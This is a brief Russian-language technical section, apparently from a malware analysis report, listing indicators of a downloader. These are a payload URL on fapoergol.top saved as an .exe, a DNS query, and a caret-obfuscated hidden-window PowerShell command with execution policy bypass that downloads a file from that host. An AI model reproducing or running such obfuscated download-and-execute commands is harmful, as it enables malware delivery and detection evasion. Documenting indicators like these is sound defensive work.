Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POW^ERshELl.e^X^e ^-EXecu^tIOnPOl^I^C^Y by^pASS ^-^N^O^P^r^oFiLE -^wIn^dOwS^TyLe h^iDDeN^ ^(neW^-o^bj^ec^t ^sYs^TeM.Net.W^EB^cLIe^nt).^DO^wnL^O^AdFiLe('http://www.fapoergol.top...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "POW^ERshELl.e^X^e ^-EXecu^tIOnPOl^I^C^Y by^pASS ^-^N^O^P^r^oFiLE -^wIn^dOwS^TyLe h^iDDeN^ ^(neW^-o^bj^ec^t ^sYs^TeM.Net.W^EB^cLIe^nt).^DO^wnL^O^AdFiLe('http://www.fapoergol.top...' (со скрытым окном)